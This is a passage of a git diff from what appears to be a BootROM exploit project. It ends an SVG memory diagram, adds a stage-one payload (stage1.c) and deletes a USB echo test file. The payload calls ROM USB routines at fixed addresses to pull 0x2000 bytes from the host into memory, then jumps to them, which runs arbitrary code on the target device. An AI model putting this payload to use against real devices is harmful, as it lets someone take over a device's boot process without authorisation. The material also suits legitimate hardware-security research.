xmlns="http://www.w3.org/1999/xhtml" style="display: inline-block; font-size: 12px; font-family: Helvetica; color: rgb(0, 0, 0); line-height: 1.2; vertical-align: top; width: 54px; white-space: nowrap; overflow-wrap: normal; text-align: center;"><div xmlns="http://www.w3.org/1999/xhtml" style="display:inline-block;text-align:inherit;text-decoration:inherit;white-space:normal;">BootROM</div></div></foreignObject></g><rect x="320" y="0" width="90" height="30" fill="none" stroke="none" pointer-events="all"/><g transform="translate(321.5,6.5)"><foreignObject style="overflow:visible;" pointer-events="all" width="19" height="12"><div xmlns="http://www.w3.org/1999/xhtml" style="display: inline-block; font-size: 12px; font-family: Helvetica; color: rgb(0, 0, 0); line-height: 1.2; vertical-align: top; white-space: nowrap; text-align: left;"><div xmlns="http://www.w3.org/1999/xhtml" style="display:inline-block;text-align:inherit;text-decoration:inherit;">0x0</div></div></foreignObject></g></g></svg>
\ No newline at end of file
diff --git a/source/exploit/stage1/stage1.c b/source/exploit/stage1/stage1.c
new file mode 100644
index 0000000..63f3f12
--- /dev/null
+++ b/source/exploit/stage1/stage1.c
@@ -0,0 +1,86 @@
+#include <stdint.h>
+
+//  Create external function at 0x00006f88
+extern void maybe_usb_setup_read(char endpoint,void *fun,uint32_t target_buffer);
+extern void dwc3_ep0_start_trans(char endpoint,uint32_t target_buf, uint32_t len);
+extern int usb_event_handler(void);
+extern uint32_t get_endpoint_recv_buffer(char endpoint);
+extern void sleep(int endpoint,uint32_t timeout);
+extern void usb_send(uint32_t address,uint32_t size);
+extern void rom_send();
+
+#define recv_buffer 0x206fe00 //0x02021800 + 0x3000
+#define data_received 0x206fd00
+
+void recv_data_cb(uint32_t endpoint, uint32_t len){
+    char *dest_buf = (char *)recv_buffer;
+    volatile void *dref = (void *)data_received;
+    
+    void *rbuf = get_endpoint_recv_buffer(endpoint);
+    for(int i= 0; i < len; i++){
+        dest_buf[i] = *(char *)(void *)((int)rbuf + i);
+    }
+    *(uint8_t *)dref = 1; // Mark as ready
+}
+
+void recv_data(uint32_t address, uint32_t size){
+    // 
+    volatile void *dref = (void *)data_received;
+    *(uint8_t *)dref = 0;
+
+    maybe_usb_setup_read(2, recv_data_cb, 0x200);
+    uint32_t rbuf = get_endpoint_recv_buffer(2);
+    dwc3_ep0_start_trans(2, rbuf, 0x200);
+    while(1){
+        usb_event_handler();
+        if(*(uint8_t *)dref == 1){
+            break;
+        }
+    }
+    // Copy to destination location
+    char *dest_buf = (char *)address;
+    for(int i= 0; i < size; i++){
+        dest_buf[i] = *(char *)(void *)((int)recv_buffer + i);
+    }
+}
+
+// void send_data_cb(uint32_t endpoint, uint32_t len){
+//     // Tell event handler that the data was received
+//     volatile void *dref = (void *)data_received;
+//     *(uint8_t *)dref = 1; // Mark as ready
+// }
+
+// void send_data(uint32_t address, uint32_t size){
+//     volatile void *dref = (void *)data_received;
+//     *(uint8_t *)dref = 0;
+//     maybe_usb_setup_read(0x1, send_data_cb, size);
+//     // uint32_t rbuf = get_endpoint_recv_buffer(1);
+//     dwc3_ep0_start_trans(1, address, size);
+//     while(1){
+//         usb_event_handler();
+//         if(*(uint8_t *)dref == 1){
+//             break;
+//         }
+//     }
+// }
+#define debugger_location 0x2069000
+
+int main() {
+    // First payload is 0x2000 in size
+    int block_sz = 0x200;
+    int to_recv = 0x2000;
+    for(int block = 0; block < to_recv; block+=block_sz){
+        recv_data(0x2069000 + block, block_sz);
+    }
+
+    // Create function at debugger_location
+    void (*custom_func)() = (void*)0x2069000; //mem_off;
+    custom_func();
+    
+    // uint32_t count = 0;
+    // while(1){
+    //     // recv_data();
+    //     // send_data(recv_buffer, 0x200);
+    //     // send_data("GiAs", 4);
+    // }
+}
\ No newline at end of file
diff --git a/source/exploit/symbols.txt b/source/exploit/stage1/symbols.txt
similarity index 100%
rename from source/exploit/symbols.txt
rename to source/exploit/stage1/symbols.txt
diff --git a/source/exploit/test_dwc3.c b/source/exploit/test_dwc3.c
deleted file mode 100644
index b50ba48..0000000
--- a/source/exploit/test_dwc3.c
+++ /dev/null
@@ -1,72 +0,0 @@
-#include <stdint.h>
-
-//  Create external function at 0x00006f88
-extern void maybe_usb_setup_read(char endpoint,void *fun,uint32_t target_buffer);
-extern void dwc3_ep0_start_trans(char endpoint,uint32_t target_buf, uint32_t len);
-extern int usb_event_handler(void);
-extern uint32_t get_endpoint_recv_buffer(char endpoint);
-extern void sleep(int endpoint,uint32_t timeout);
-extern void usb_send(uint32_t address,uint32_t size);
-extern void rom_send();
-
-#define recv_buffer 0x02021800 + 0x3000
-#define data_received 0x02021800 + 0x2004
-
-void recv_data_cb(uint32_t endpoint, uint32_t len){
-    char *dest_buf = (char *)recv_buffer;
-    volatile void *dref = (void *)data_received;
-    
-    void *rbuf = get_endpoint_recv_buffer(endpoint);
-    for(int i= 0; i < len; i++){
-        dest_buf[i] = *(char *)(void *)((int)rbuf + i);
-    }
-    *(uint8_t *)dref = 1; // Mark as ready
-}
-
-void recv_data(){
-    // Set data_received to 0
-    // uint32_t *r = (uint32_t *) data_received;
-    // r = 0;
-    volatile void *dref = (void *)data_received;
-    *(uint8_t *)dref = 0;
-
-    maybe_usb_setup_read(2, recv_data_cb, 0x200);
-    uint32_t rbuf = get_endpoint_recv_buffer(2);
-    dwc3_ep0_start_trans(2, rbuf, 0x200);
-    while(1){
-        usb_event_handler();
-        if(*(uint8_t *)dref == 1){
-            break;
-        }
-    }
-}
-
-void send_data_cb(uint32_t endpoint, uint32_t len){
-    // Tell event handler that the data was received
-    volatile void *dref = (void *)data_received;
-    *(uint8_t *)dref = 1; // Mark as ready
-}
-
-void send_data(uint32_t address, uint32_t size){
-    volatile void *dref = (void *)data_received;
-    *(uint8_t *)dref = 0;
-    maybe_usb_setup_read(0x1, send_data_cb, 0x200);
-    // uint32_t rbuf = get_endpoint_recv_buffer(1);
-    dwc3_ep0_start_trans(1, address, 0x200);
-    while(1){
-        usb_event_handler();
-        if(*(uint8_t *)dref == 1){
-            break;
-        }
-    }
-}
-
-
-int main() {
-    
-    uint32_t count = 0;
-    while(1){
-        recv_data();
-        send_data(recv_buffer, 0x200);
-    }
-}
\ No newline at end of file